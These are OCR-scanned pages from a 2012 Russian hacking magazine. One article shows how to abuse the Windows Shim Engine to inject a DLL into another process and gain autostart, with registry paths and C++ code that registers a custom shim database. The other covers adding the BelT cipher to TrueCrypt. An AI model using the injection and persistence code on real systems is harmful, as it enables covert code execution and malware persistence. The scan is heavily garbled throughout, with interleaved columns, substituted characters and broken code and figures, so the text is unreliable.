НЕИЗМЕННО ВЫСОКАЯ ДОСТУПНОСТЬ
HOWTO: как создать высокоnроизводи тельный и устойчивый к сбоям файловый сервиснабазеnарочкистареньк их
серверов и Samba.
ХАКЕР
11
БИТВЫ ЗЕЛЕНЫХ РОБОТОВ
Стандартная прошивка для Апdгоid смартфона -удел тети Клавы, когда есть
мощные альтернативные СуапоgепМоd и
firmware в лице
MIUI.
FERRUM
•
СВЕЖЕЕДЫХАНИЕ В этом году корпорация
Microsoft прак
тически полностью обновит линейки своих основных nродуктов. Кратко nрой демся по всем основным новинкам
2012.
04/159/2012
•
СЕТЕВОЙ ФОРСАЖ Редакциярешила , наконе~обновить свои старые точки доступа. Берем пять топовых беспроводных маршрутизато ров и выбираем из них лучший.
083
www.epidemz.net
~
новы и метод инжекта ИСПОЛЬЗОВАНИЕ SH IM ENGINE ДЛЯ ВНЕДРЕНИЯ КОДА И АВТОЗАГРУЗКИ
Существует множество с по соб ов инжекта кода в атакуемое прилож е ние , это и правка им порта ст оронней
dll redirection, и соз дани е уд ален ног о с адресом Loadl ibrary. С пос обов уйма,
аре
но все эти
способы довольно хо рошо известны. Можн о ли удивить чем
то искуш ен ного читател я ? Попробуем.
На уровне пользователя посмотреть на режимы совместимости можно на соо тветствующей вкладке свойств любого исполняемого
f-
дут замене ны функции в таблице импорта приложения есть механизм обратн ой сов местимости в банальным перехватом
Windows
Свойства
-7 Совмест имость -7 -7 Windows95
Режим
будет использоваться шим совместимости с
Windows 95
Что значит «буд ет использоваться>>? Это з начит, что из стан
дартной базы шимов будет извлеченанекоторая информация, на ос нове нее будет загружена стандартная
dll
для сов местимо с ти ,
в которой есть опять-таки стандартные функции. И именно ими бу-
some.exe.
То
обеспечивается
AP I.
И спользова ни е шимов позволяет о ч ень многое, от простых вещ ей вроде добавл ения флагов в РЕВ, до виртуализации реестра
и полного изменения пов еден ия Неар Мапаgег'а. К примеру, шим, виртуализирующий реестр, перехватывает
практически все функции работы с реестром в
файла:
Совместимости
и атака
потока, и пос ылка
ЧТО ТАКОЕ SHIMЪI? Shim Engin e - это технология для обесnечения совместимости старших версий Windows с младшими, реали зованная в различ ных dll, а также через некоторые калбеки и хаки в РЕ -заг рузчике библиотеки ntdll.dll.
some. ехе -7
dll,
типа
ADVAP 132.DLL:
RegConnectRegistryA, RegConnectRegistryW, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExW,RegCloseKey, RegOpenKeyW, RegQueryValueA, RegQueryValueW, RegCreateKeyA, RegCreateKeyW, RegCreateKeyExA, RegCreateKeyExW, RegEnumValueA, RegEnumValueW, RegEnumKeyA, RegEnumKeyW, RegEnumKeyExA, RegEnumKeyExW, RegQueryinfoKeyA, RegQueryinfoKeyW, RegSetValueExA, RegSetValueExW, RegDeleteKeyA, RegDeleteKeyW
www.epidemz.net
Добавляем свое nриложение в ЕМЕТ
Включаем режим логирования шимов
Далее мы разберемся, как работает
Shim Engine и как его мож
но исnользовать в наших целях, а цели у нас nростые- загрузить
сво й код в чужой nроцесс.
(HKEY_CURRENT_USER \Software \Microsoft\Windows NT \ CurrentVersion \ AppCompatFlags\ Layer s ] "C: \\Doc uments and S e tt i n gs\\ Admin \ \Paбoчий cтoл \\test. exe" ="WIN2eee "
ИССЛЕДУЕМ ШИМЫ Чтобы n о на б люд ать ра бо т у шимов, можн о включить режим
Как видишь, о н а указывает, что для
test.exe должен nри Win2000. Вероятно, это значит, что мы можем
логирования. Дл я эт ог о надо установи ть системную nеременную
меняться шим
о кружения
устанавливать режим совместимости любому nриложению nри
SHIMENG_ DEBUG _ LEVEL равной 4 и nерезагрузиться [nерезагрузка требуется nри любых и зменениях или добавлениях
системных nеременных окружения !.
кода мы должны не столько nроnисать, сколько установить для
Если nосле этого заnусти ть любое nриложение [nусть это будет б л окнот, nереименованный в test.exel в р ежи м е совместимости с, наnример,
нудительно. Это нам nригодит ся. Однако для внедрения своего
Windows 2000 и включить WinDbg , можно наблюдать
любоnытные лаги. Н аnример, такие:
него свой
[IJ режим совместимости. То есть nридется создать
и внедрить в систему свою собствен н ую базу ш имов. Решение о том, как это сделать, не лежи т на nоверхности. В ветке
AppCompatFiags больше ничего интерес н о г о нет. П оэтому nри дется коnнуть немного глубже.
( INFO] (SeiSet layerEnvVar] Env var set _CQ\1PAT_ LAYER="Win2000" (INFO] (SE_Dllloaded]
INIТ.
loading DLL "Aclaye rs .DLL " .
ИЩЕМ СПОСОБ ВНЕДРЕНИЯ СВОЕЙ БАЗЫ ШИМОВ Забегая вnеред, скажу, что
Shim Engine в основ н о м реализо-
ван в shime ng.dll и apphelp.dll, а базы шимов лежат в sysmain.
(MSG ] (Seiinit] Shim DLL е х 71ббееее "C: \ WINDOWS \ AppPatch \ Aclayers.DLL " loaded (MSG ] ( Seiinit] Using s нrм " Win2eeeversionlie!Aclayers.DLL"
sdb и dгvmain.sdb [в директории \W INDOW S\App Patchl, однако загрузкой стандартной dll шимов, nарси нг омбазы и nерехватом функций занимается неnосредстве нн о за гру зчик РЕ - м одулей
Windows. Тот самый, что сидит в ntdll.dll. Конечно, чтобы лучше (INFO] (Seiinit] GetHookAPis returns 3 hook s for DLL " С: \ WINOOWS \ AppPatch \ AcLayers . DLL" S НIM " Win2eeever sionlie" (MSG ] (Seiinit] Using S НIM "VirtualRegist r y!AcLayers.DLL " (MSG ] (Seiinit] Command line for Shim "VirtualRegistry " : "WIN2K " (INFO] (Seiinit] GetHookAPis return s 27 hook s for DLL "С:\ WINOOWS \ AppPatch \ Aclayers.DLL" SНIM "VirtualRegistry" (MSG ] (Seiinit] Using S НIM "DuplicateHandleFix!Aclayers .DLL " (I NFO] (Seiin i t] GetHookAPis returns 1 hooks for DLL "С :\ WINOOWS \ AppPatch \ AcLayers.DLL" S НIM "Duplic ateHandleFi x" ( INFO] (SE_Dllloaded] INIТ . loading DLL "AcGenral.DLL " . (MSG ] (Seiinit] Using SНIM " LoadLibraryCWD!AcGenral.DLL" ( INFO] (Seiinit] GetHookAPis retu r ns е hooks fo r DLL " С: \ WINOOWS \ AppPatch\AcGenral.DLL" S НIM "LoadLibraryCWD" [ MSG ] [ Seiini t] Using SНIM "Win2kPropagatelayer! Aclayers. DLL " (INFO] (Seiinit] GetHookAPis returns 3 hooks for DLL "С: \ WINOOWS \ AppPatch\Aclayers.DLL " SHIM "Win2kPropagatelayer" И з них вид но, чт о за гр узился слой
Win2000, а также
стандартная shi m d ll- C:\W IND OWS\AppPatch\Aclayeгs.DLL. П осле этого произошло извлеч ение и nрименение шимов, таких как Viгtuai R egistгy,
Dup licateHandleFix и так далее,
nонять , как внедрить свою базу, начать исследование лучше всего с момента загрузки
Shim Engine, а искать этот момент луч
ше всего с начала работы системного загрузчика, а системн ы й загр у зчик начинает работу с аре-дисnетчера.
Но мы не будем закаnываться в такие недра и начнем с функции инициализации вышеуnомянутого загрузчика РЕ-файлов:
_Ldrp initializeProcess: .text:7C921B36 mov .text:7C92 1B ЗC mov
еЬх,
еах,
large fs: 18h ; ТЕВ (еах+Зеh ] ; РЕВ
.text:7C921B62 .text:7C921B68
lea mov
еах,
[ebx+1E8h ] ; peb->pShimData
есх ,
(еах]
.text:7C921B87
mov
(ebp+var_104],
есх
loc_7C921693:
.text:7C921693 .text:7C921699 .text:7C92169B .text:7C92169D
mov xor cmp jz
edi, [ebp+var_104] esi) esi edi, esi loc_7C923CD0 ULONG в peb - >pShimData
а затем уже nерехват функций [ nерехватов много, лаги n ос киn а н ы 1. В реестре тем временем сфор мир овалась следующая
ес ли
заnись:
с ов местимости
www.epidemz.net
первый
то прыгаем
( в случае включенного шима прыжка не происходит)
е,
~
Kerne l
ile
Edit
com:oope,port =\\\p~ipe\com_
View
\~lindow
Debug
.resets=lf-
wonUDg:O. IдJUUL.D'
s ; idautils.Strings( False ) s.setu p( strtypes ; Strings.STR_UNICODE
Help
13 1 ommand · Kernel
' com:pipe, port = \\ .\ p i pe\con"'_l , r~ets = O ' -
for i, v in enumerate( s ): i f v is Non e: print ( "Failed оп %d" % i ) else : print ( "%х ;) %s " % ( v.ea, str( v ) ) )
Win Dbg:6.12.0002.633 AMD64
[ INFO] [SeiHookimports] Hooking module 0:-:77110000 "OLEAUT32 . dll" [ INFO] [SeiHookimports] Hooking module 0:-: 77800000 "HSACI!32 . dll " [ШFOJ [SeiHookimports] Hooking module 0:-:778FOOOO "VERSION . dll" [INFO] [SeiHookimports] Hooking module 0:-:7С9СОООО "SHELL32 . dll " [ ШFО] [SeiHookionports] Hooking module 0:.:77 F60000 "SHLVAPI . dll " [ ШFО] [SeiHookimports] Hooking module О:-:769АОООО "USEREIIV . dll " [INFO] [SeiHooki•ports] Hooking module 0:-:58260000 "UxTheme . dll " [1/ARII] [SeiResetEntryProcessedl Don't mess vith "ntdll . dll " [1/ARII] [SeiResetEntryProcessedl Don't "ess <~ith "kernel32 . dll " [1/ARN] [SeiResetEntryProcessedl Reseting "Secur32 . dll " [YARN] [ SeiResetEntryProcessedl Reseting "RPCRТ4 . dll " [1/ARN] [ SeiResetEntryProcessedl Reseting "ADVAPI32 . dll " [1/ARN] [SeiResetEntryProcessedl Don' t mess with "ShimEng . dll" [1/ARN] [SeiResetEntryProcessedl Reseting "GDI32 . dll" [1/ARII] [SeiResetEntryProcessed l Reseting "USER32 . dll " [1/ARII] [SeiResetEntryProcessedl Reseting "1/INMM . dll " [1/ARN] [SeiResetEntryProcessedl Reseting "msvcrt. dll " [1/ARN] [SeiResetEntryProcessed] Reseting "ole32 . dll" [1/ARII] [SeiResetEntryProcessedl Reseting "OLEAUT32 . dll " [1/ARN] [SeiReset EntryProcessedl Reseting "MSACИ32 . dll " [ 1/ARII] [SeiReset En tryProcessed 1 Reset ing "VERSIOII . dll" [1/ARN] [ SeiResetEntryProcessedl Reseting "SHL\IAPI . dll " [1/ARNI [SeiResetEntryProcessedl Reseting "SHELL32 . dll" [1/ARIII [SeiResetEntryProcessedl Reseting "USEREIIV . dll " [ 1/ARII 1 [ SeiResetEn tryProcessed 1 Reset ing " UxTheme . dll • [1/ARIII [SeiResetEntryProcessedl Don't •ess vith "AcGenral . DLL " [IIIFOI [SE_Dllloadedl AFТER INIТ . loading DLL " IMM 32 . DLL ". [IIIFOI [PatchNevИodulesl Dynamic loaded modules [ IIIFOI [SeiHooklмportsl Hooking module Ох7636000 0 "IИИ32 . DLL " [IIIFOI [SE_Dllloadedl AFТER INIТ . loading DLL " comctlЗ2 . dll ". [ Il!FOI [PatchNevModulesl Dynamic loaded modules [ IIIFOI [SeiHookimportsl Hooking module О:-:77ЗСО ООО "comctl32 . dll" [ INFOI [SE_Dllloadedl АПЕR IIIIТ . loading DLL "co mctlЗ2 . dll ". [IIIFOI [PatchNevИodulesl Dynamic loaded JAodules [ Il!FOI [SeiHookionportsl Hooking module Oz5D580000 "comct l32 . dll" [III FO] [SE_Dllloadedl AFТER IIIIT . loading DLL " IПMARТA . DLL" . [IN FOI [PatchNevИodulesl Dynamic loaded modules [ IIIFOI [SeiHookimportsl Hooking module Oz77680000 " NП!ARTA . DLL" [IIIFO] [SeiHooklmportsl Hooking module Oz718DOOOO " SAИLI8 . dll " [ IIIFO] [SeiHookimportsl Hooking module 0:-: 76F50000 "I/LDAP32 . dll • [IIIFOI [SE_Dllloadedl AFТER IIIIT . loading DLL "xpsp2res . dll ". [IIIFO] [Patch llevModulesl Dynamic l oaded "odules [IIIFOI [ SE_Dllloade dl AFTER It!IT . loading DLL ""ebclnt . dll ". [IIIFOI [PatchllevИodulesl Dynamic l oaded modu les [ IIIFOI [SeiHookimportsl Hook ing module Ох5АВСОООО "vebclnt . dll " [IIIFOI [SeiHookimportsl Hooking module О :-: З F 9ЕОООО "1/IIIШEТ . dll " [ IIIFOI [SeiHookimportsl Hooking module Oz00940000 "llormal iz . dll " [IIIFOI [Sei H ookiмportsl Hooking module Оо-.45020000 "urlмon . dll " [IIIFOI [SeiHookimportsl Hooking module Оо-.40080000 "iertutil . dll "
print "Script Started . .. " EnumStrings() print "Script Ended . .. " idautils.Stгings!False) - в конструкторе по умолчанию стоит Тгuе, но так как нас интересуют nомимо обычных строк еще июни кодные, то ставим
ем выведенные строки и почти в самом конце находим интересный ключ:
Sd8749be -> \ Registry\Mach ine \Soft wa re \Microsoft \Wi ndows NT \ Curren tVe rsion\AppCompatFlags \Ins talledSDB По хгеf'у добираемся до функции
SdbResolveDatabase, кото Da tabasePath
рая открыва ет данный ключ и смотрит значения и
DatabaseType . Далее
определяем, что данный ключ предназна
чен !о чудо!) для пользовательских баз шимов, которые должны быть nредс тавлены в виде GU ID 'o в !как в реестре , так и в самой базе).
Таким образом, ключ вида и
DatabaseType)- это
{GUID}
и два значения
СОЗДАНИЕ СОБСТВЕННОЙ БАЗЫ ШИМОВ Куда прописать базу, мы определили, но вопрос о том, как форми ровать саму базу шимов, остался открытым. А ведь это реальная
проблема, формат базы неизвестен, его придется восстанавли вать вручную, а это очень бол ьшая работа. Может быть, есть какой-то обходной путь? Он действительно есть, и зак лючается в использовании уже готовой базы' Все что нам нужно- найти приложение, которое использует свою
WinDbg
базу, и подменить в ней некоторые данные на наши. Приложе
ние, которое нашел я, называется ЕМЕТ
push push mov push call
.text:7C9216AЗ
.text:7C9216A4 .text:7C9216AA .text:7C9216B8 .text:7C9216Bl ;
а
вот
IDatabasePath
все что нам нужно для прописывания базы
для конкретного nриложения.
DavReadRegistryValues/ RegQueryValueEx\/(4 ) . 11Status = 1 27 DavReadRegistryValues/RegQueryValueE:<\1 (5) . YStatus • 127 DavReadRegistryValues/ RegQueryValueEz\1 (6) . YStatus • 127 [SE_Dllloadedl AFТER IIПT . l oading DLL "cryptsvc . dll ". [PatchllevModulesl Dynaonic loaded modules [SeiHookimportsl Hooking module Oz76DOOOOO "cryptsvc . dll " [SeiHookimportsl Hooking onodule 0:<76850000 "certcli . dll "
Лоrи шимов в
defau lt_setup ; Fa lse и настраиваем setup сами. IDA библиотеке, просматрива
Выполняем скриnт на загруженной в
Ш:~8J [~~~:~i::~~:J ~:~~~~ :~~~: ~~~iШШ ::~~blii>d~E -
ERROR : ERROR : ERROR : [IIIFOI [ IIIFOI [IIIFOI [IIIFOI
Strings.STR_C )
1
и
момен т
загру зк и
движка
lgoo.g i/9Dn5 L).
Качаем,
запускае м Pг ocess Monitoг от Руссиновича, чтобы фиксировать
edi [ebp+var_D8] [ebx+lECh ], esi edi _Ldrploa dShimEn gine@12
все действия программы , уста навливаем ЕМЕТ, запускаем С : \
Ргоgгаm
Files\ EMET \ EMET_GUI.exe, test.exe, закрываем
добавляем наш
выбираем Configuгe
Apps,
ЕМЕТ. В л агах монитора
видим, что база шимов ЕМЕТ 'а установилась в
(: \WINDOWS \
Ap pP atch\Custom\{f8c 4cc07-бdc4-41 8f-Ь72 b -304fcdbб 4052}.
шимов
sdb, В LdгploadShimEngine nервым параметром передае тся
а
dll
скопиро валась в
C:\WINDOWS\Ap pPatch \ EME T.dll .
Такж е из логов монитора получаем информацию об изме
shimeng.dll.
нениях в реестре. Был создан ключ SO FТ WAR E \\M icro so ft \\
LdгploadShimEngine грузит эту
dll,
получает адреса ф ун кций
Wind ows NT\\ Cu rrentVersion\\A ppCompatFlags\\Cus tom\\test.
из нее !LdгpGetShimEnginelnteгface), загружает базы шимов !SdЫnitDatabase), распаковывает их
ехе с нашим тестовым ехе, а также ключ, найденный нами
!SdbUnpackAppCompatData)
ранее- SOFТWARE\\Microsoft\\Windows
NT \\CurrentVersion\\
и nрименяет. Им енно отсюда мы узнаем, что движок совме
AppC ompa t F la gs\\Insta ll e dS D B \\{ f8c4 cc07 -бdc4-418f-Ы2b-
стимости живет в
304fcdbб4052}.
shimeng.dll . Давай
поищем в этой
dl l строки,
содержащие ключи реестра, может быть найдем какие-нибудь недокументированные ключи, которые укажут нам, как внедрить
Как видишь, для nринудительного указания шима исполь-
•
зовалось не стандартное место La yeгs, а
Custom . Учтем. Теперь emet.dll и ис
в систему свою базу шимов? Прощ е всего строки искать скриn
открываем базу любым hех-редактором, находим
том. Я nредnочитаю nитoнlldaPython):
правляем на
test.dll. Д алее берем test.dll и закидываем в пап C:\WINDOWS\AppPatch\. Запускаем наш test.exe и пробуем убедиться, что tes t.dll проинжектировалась в test.exe. Для этого можно воспользоваться у тилитой vmmap lgoo.gi/SsSQn ) от того же Руссиновича. Открываем test.exe с помощью vmmap и ви дим в его адресном пространстве нашу dll, а значит- mission completel ку
import idaapi import idautil s import idc def EnumStrings():
www.epidemz.net
АВТОМАТИЗИРУЕМ ПРОЦЕСС Теперь напишем nрограмму, которая будет все автоматически де лать за на с, то есть за писывать в рее стр базу шимов и копиро вать
саму базу и
dll
к ней в системную папку [все проверки поски па ны,
полный вариант с м. на диске]:
#inc l ude <wi ndows.h > #incl ude <iostream > #define GUID L "{f8c4cce7-бdc4-418f-Ь72b-Зe4fcdbб4e52}" #define SНIM_REGKEY L"SOFTWARE \\Microsoft \\Windows NT \ \ CurrentVersion\\AppCompatFlags " BOOL RegisterShimDll()
___j-___j___j
{
key; BOOL funcResult = FALSE; wchar_t dbPath[] = L"C:\\Windows\\AppPatch\\Custom\\ " GUID L" .sdb" ; DWORD dЫуре = ех1ееее ; DWORD64 sdb = exlcc8828b22e8e82 ; НКЕУ
Dll
KEY_WRITE, NU LL, &key, NULL); RegSetValueEx(key, L"DatabasePath" , е , REG_SZ, (BYTE*)dbPath , sizeof (dbPath)); RegSetVal ueEx(key, L"DatabaseType ", е , REG_DWORD, (Р В УТЕ)&dЬТуре, sizeof (DWORD)); RegCloseKey(key) ;
создаем подраз дел Custom в AppCompatFlags RegCreateKeyEx(HKEY_LOCAL_MACHINE, SНIM_REGKEY L"\\Custom", е , NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &key, NU LL ); RegCloseKey(key);
11
11
успешн о внедрена
return TRUE;
со здаем ключ
BOOL CopyShimFi l es()
RegCreateKeyEx(HKEY_LOCAL_MACHINE, SНIM_REGKEY L"\\Custom\\test.exe" , е , NULL , REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &key, NULL); RegSetValueEx(key, GUID L".sdb" , е , REG_QWORD, (PBYTE )&sdb, sizeof (DWORD64)); RegCloseKey(key);
{
CreateDirectory( L"C:\\Windows \\AppPatch \\Custom" , NULL); CopyFile( GUID L". sdb ", L"C: \\Windows \\AppPatch \\Custom\\ " GUID L".sdb" , TRUE ); CopyFi le( L"test.dll" , L"C :\\Windows \\AppPatch \\test.dll" , TRUE );
RegCreateKeyEx(HKEY_LOCAL_MACHINE, SНIM_REGKEY L" \ \ InstalledSDB" , е , NULL, _OPTION_NON_VO LATI LE , KEY_W RITE, NULL, &key, NULL) ; RegCloseKey(key) ;
return TR UE;
int main () RegCreateKeyEx(HKEY_LOCAL_MACHINE, SНIM_REGKEY L" \ \ InstalledSDB\ \ " GUID, е , NULL, REG_OPTION_NON_VOLATILE,
ФУНКЦИИ
CopyShimF iles (); Registe rSh imDll (); std: :cout << "Shim inject complete ... " << std: :end l; std : :cout << "Run test.exe and use vmmap.exe to see test. dll in АР t est .exe" << std: :endl;
SHIMENG.DLL
shimeng.dll есть восемь экспортируемых функций: SE_DIIloaded- вызывается лоадером при загрузке dll; SE _DIIUnloaded- вызывается лоадером nри выгрузке dll; SE_DynamicShim- неизвестно кем вызывается ;
return
У
е;
ЗАКЛЮЧЕНИЕ
SE_Get PгocAddг ess - вызывается лоадером nри GetPгocAddгess ;
Описат~ в одной статье все преимущества столь мощной тех
SE_Instai iAfteгlnit- вызывается лоадером после инициализации
нологии как
движка шимов ;
можно почерпнуть многое.
SE _ InstaiiBefoгelnit- вызывается лоадером сразу после того, как кодом из этой же
не получится, н о даже из этой с татьи
Во-первых, шимы дают возможность инжектирова ть ся в лю бое пр иложени е средствами самой системы .
он получит указатели на данные функции;
SE_IsShimDII- вызывается
shim engine
dll;
Во-вторых, прописав шим, например, для ехрlогег.ехе,
SE _ PгocessDying- вызывается nри уничтожении процесса , то есть
этот факт может быть использован и как м етод ав тозагр узк и.
чуть раньше того момента, когда все точки входа dll ' oк nроцесса
А в-третьих, шимы дают возможнос ть еще и перехватывать
вызываются с причиной DLL _ PROCESS _ DEТACH.
функции атакуемого приложения, однако это требует д еталь ного изучения формата базы. :Н:
www.epidemz.net
КОДИНГ
Johnny Catch [johnny.catchiOgmail .coml
криптование ДОБАВЛЯЕМ ПОДДЕРЖКУ СВОИХ АЛГОРИТМОВ
BTRUECRYPT Наверняка все, кто когда-либо сталкивался с задачей создания шифрованного контейнера ,
знают о существовании программы
TrueCrypt.
Простота использования, высо к ая скорость работы , открытые исходники и ши рокие фун к циональные возможности с делали этот
шифровальщик одним из самых популярны х в мире. Сегодня речь пойдет о том, как переделать его под себя .
~TrueCrypt
GJ ~ ~
S~stem
:tolumes Dr.ve .;.о (:
F.!tVOI~es
TQ.Ois
Settings
НomepaQe
!jelp
Н
а сегодняшний день ТгuеСгурt является одной и з самых
популярных программ для создания шифрованных файловконтейнеро в , шифр ованных носителей информации, а также
Vokxne System pмtit:юn
200GВ
Encryption .alqorithm AES
System
для шифрования операционных систем. При использовании средств
E:\Archlves\B.,ckup
139М8
AES
Norma!
сутствии в коде программы и алгоритмов шифрования различных
Size
Туре
_. F: _.G:
подобного рода иногда возникает потребность удостовериться в от закладок, которые могут скрытно сохранять информацию о ключах. Убедившись в обратном, возникает желание сделать собственными руками <<доверен ный » билд программы, в котором точно будет все о к. Также недоверие к зарубежным шифрам и здоровый патриотизм по рой наталкивают на мысль добавить в данную программу отечес т вен ные криптографические алгоритмы, которые во многом не уступают зарубежным аналогам. Реализовать и то, и другое позволяет наличие W.pe Cache _______!]
Cre&e Volume Vokxne 1E:\Archlves\Backup
Select File ...
открытых исходных текстов ТгuеСгурt.
ПОДГОТОВКА К РАБОТЕ Пр ежде чем приступать к реализации нового алгоритма шифро
V Never save history
Select Dev!Ce ...
вания, подготовим все, что нужно для сборки. В первую очередь нам понадобятся исходники программы, которые можно скачать
Мount
Auto-Мount
OeVICeS
Dismount дl
с официального сайта разработчика tгuecгypt.oгg lя использовал исходникиверсии
Главное окно nрограммы
TrueCrypt
пользовать
7.0al. В качестве среды разработки будем ис MS Visual Studio 2010 !несмотря на то, что разработчики
ХАКЕР
088
www.epidemz.net
04/159/2012
Тгuе-кри п това ни е
стан д а р та в Бе л оруссии. Этот а л го р и т м работает с блокам и д анных
с/
с
(/
длиной
128
бит и с ключами д л иной
128, 192
или
256
бит. Дл я ко
динга я выбрал вариант шифра с 256-битным ключом. П рограммная реализация любого симме т ри ч ного шифра в ТгuеСгурt долж н а со д ержать в себе следующие т ри функ ц ии :
функ ц ию и ниц и ализа ц ии шифра, кото р ая осу щ ес т вляет выработку массива раундовых по д клю ч ей из к л юча шифрования, фу н к ц ию
шифрования и функ ц ию расшифровки блока сообщен и я. Для алгоритма
Bei T функция
инициализации будет иметь сле
дующий вид:
void bel t_i nit ( un s i gned _int8 * k, int klen , unsigned __ int8 * ks) for (i ;
е;
i< 32 ; ++i) ks [i]
k[i];
Первый nараметр функции - массив, содержащий ключ шифрования данных, второй nараметр-длина данного к л юча,
а третий- массив раундовых подключей (его длина за д ается в коде T rueCгypt константой длина
key schedule
MAX_K EY_ LEN GTH-
макс и маль н ая
алгоритмов шифрования, поддерживающихся
Т rueCгyptl. В данной реализации функц и и
belt_init
есть д ве особенности.
Во-первых, мы знаем точно, что на вхо д будет по д аваться массив длиной в
32
байта, поэтому проверку значения
kl en
м ож н о опу
стить (хотя можно поставить asseг t l. Второй момент- здесь мы просто один раз копируем ключ в массив раундовых ключей вместо многократного копирования ключа. П ринимая во внимание
Boot Attack,
Cold
при создании программных реализаций алгоритмов
я стремлюсь минимизировать кол и чество ключевой и нформа ц ии
С х ема работы алгоритма ВеiТ
в оперативной памяти ко м пьюте р а, и данная реализац и я ши фра создается с учетом этого.
используют MS VS 2008 SP11. Также нам понадобится 16-битный компилятор от
Microsoft, который идет в комплекте с MS Visual С++ 1.52. Эту в ерсию студ ии можно скачать по подписке MSDN, либо с рутрекера
:1.
К слову сказа т ь, 16-би т ный компилятор нужен для
Переходим к функции шифрования блока дан н ых lкодинг функции расшифровки смотри на диске!. Итак, сначала зададим несколько глобальных переменных:
оказаться н езаменимым п омощником при восстановлении данных
l iблок подста новки (SBox) uпsigned __ int8 Н [ 256 ] ; { ... };
из-за пов р ежде н ия ко д а за гр уз ч ика на жестком диске . Также
// массив с индексами
следуе т отметить, что устана в ли в ать
unsigned int Key l ndex [8][ 7] ; { . .. };
компи л я ции кода образов загрузочной дискеты, которая может
Visual С++ 1.52 тебе не нужно
подключей
-н еобходимо только распа к овать архив.
Кроме перечисленного п о т ребуются
NASM, gzip,
WiпD D K, а так
Массив Н является блоком подстановки, который за д ается табли
цей (смотри стандарт СТБ 34.101.3 1-20111, второй массив пре д ставля
же хедер ы PKSC # 11 ( д оступны на сайте RSA Data Securityl . Е сли все скача н о и ус т а н овле н о, приступаем к н астройке этого добра. В пе р вую очере д ь н ам необхо д имо добавить н есколько
ет собой индексы используемых раундовых подк л ю ч ей. Д л я ускоре ния работы кода некоторые операции оформим в виде макросов:
переменных среды:
1. MSVC16_ROOT со значе н ием,
р авн ы м п ути к папке
будетсоз дана после изв л ечения архива с
MSVC15, которая Micr osoftVisual С++ 1.52;
2. WINDD K_ ROOT со значе н ием, р авным пути, по которому мы уста нов ил и WinDDK; 3. PKCS11_ 1N C со значением, равным пути к папке с Р КСS # 11-
#define HUl (x ,H ) ((( unsigned __int32 ) ( Н)[ Ul ( (x)) ]) < < 24 ) #define HU 2(x ,H ) ((( unsigned __int32 ) ( Н ) [ U2(( x)) ]) << 16 ) #define НU З(х ,Н) ((( unsigned __ int32 ) (Н ) [ U З (( х ) ) ]) << 8)
хедерами.
Д альше п одкорректируем значение переменной РАТН , к кото
рой добавим пути к ехе'шникам от
NAS M и gzip. П осле правок пере
РЕЖИМХТS
менных среды может п отребоваться п ерезагрузка компьютера. Д ля прове рки ко р рек тн ос ти п ра в ок РАТН по п робуй открыть коман д ную
строку, п ерейти в коре н ь ди ска С :\ и запуст ить gzi p.exe. Е сли за
XTS- основной
режим работы блочных шифров в программе
пуск про ш ел успе ш но, т о все о к. Р аз все ус т ановлено и настроено,
TrueCгypt. По сути , данный режим является слегка измененным
попробуем сделать билд
режимом ХЕХ , который был разработан Филиппом Рогауэем в
TrueCrypt:
распако вы ваем исхо д ники,
2003
открываем солюшн в Visual Studio (попутно его конвертируем!, вы
году . Отличия между режимами заключаются в том, что ХЕХ для
бираем конфигурацию
двух различных целей использует один и тот же ключ, в то время
Release
All
и жмем
Build.
Есл и в се хоро ш о, то в папке
окажется свежеекомпи лир ова нн ый
TrueC r ypt. Те п е рь
давай д оба в им в н его n о дд е р жку нового ал г оритма ш и фрован и я.
как
XTS
использует два независимых ключа. В
был одобрен
NIST для
в устройства х х ранения информации. Также в
КОДИНГАЛГОРИТМА
был одобрен
В ка ч естве а лгорит м а ш иф р ования для встраи в ани я я выбрал сим метрич н ый алго р итм
ХАКЕР
Bei T,
2010
году режим
XTS
обеспечения конфиденциальности данных
IEEE IIEEE 16191. Схему
2007
работы режима
этот режим
XTS
смотри
на рисунке.
который недав н о б ы л п риня т в к ачестве
089
04 /159/ 2012
www.epidemz.net
КОДИНГ #define HU4(x,H) ((( unsigned __ int32 ) ( Н)[ U4 ((x)) ])) #define G(x,H,r) RotHi(HU4 ((x),( H)) 1 HU3((x),( H)) \ 1 HU 2((x),( H)) 1 HUl( (x) , (H)),(r))
Буфер:
Сортировка: l сре.а няя а<орость (убыван11е ::=J
15мб Шифро вание
Алгоритм
Макросы
HU применяют блок nодстановкик определенному байту в DWOR D, а макрос G задает одноименное nреобразование из
AES Twofish Serpent
описания шифра . П осле оп р еделения нужных макросов остает-
Ве1Т
ся только запрограммировать схему работы алгоритма !смотри рисунок]. •
void belt_encrypt
Сре.а н ее
161Мб /с
1171~б/с 74.41~6 /с
88.0 Мб /с 75.6 Мб /с 65.5 ""'!<: 63.6 Мб/с 58. 5 Мб/с 51.6 Мб/с 39.4 Мб/с 32.5 Мб/с 33.0 Мб/с
67.7 ""!с 66.8 Мб /с 70.9 Мб/с 52.6 Мб/с 45.8 Мб/с 36. 1 Мб/с 30.8 Мб/с
ГОСТ28147·89
AES·Twofish Serpent·AES T•Nofish·Serpent AES·T•Nofish·Serpent SerpenHwofish -AES
Прототип функции шифрования одного блока имеет вид:
Ра01111фро ...
177Мб /с
Те ст
1691~б /с Закрыть
1021~б/с
75.0 l~б/с 66.6 Мб/с 65.2 Мб/с
Н а скорость BЛIIЯ IOT
б4.7Мб /с
загр у3Ка ЦП
52.1 Мб/с
11
характ е ристию1
4 2 .6Мб/с
устроi1ст в
34.3Мб/с
хра нения
31.9Мб /с
аанных .
(
Э п1 т есты
unsigned __int8 *k s, unsigned __ int8 * inBlock, unsigned __ int8 * outBlock
В ЫЛОЛН RЮТUI
6
О ЗУ.
Результаты бенчмарка
); Реализация данной функции приведена на рисунке. В целом
TrueCrypt
ос тавить возможность использования нашего алгоритма для
программная реализация шифрования одного блока не вызы
ш и фрования системы в целом. Также объявим констан т у, опреде
вает проблем - блок делится на четыре значения типа
л я ю щ у ю размер key schedule нашего алгоритма [как помнишь, я
DWORD,
над которыми в течение восьми раундов проводятся операции
с пеци а л ьно сделал так , чтобы о н с о впадал с осно вн ым ключом, то
наложения nодстановки , сдвига , сложения и так далее . И соз
е с т ь был равен 32 байтам]:
дание программной реализации алгоритма
BeiT
не сложнее
#define BELT_KS 32
программирования известного алгоритма ГОСТ28147-89 . На данном этапе все готово к встраиванию алгоритма в програ мму
ТгuеСг у рt.
МОДИФИКАЦИЯ
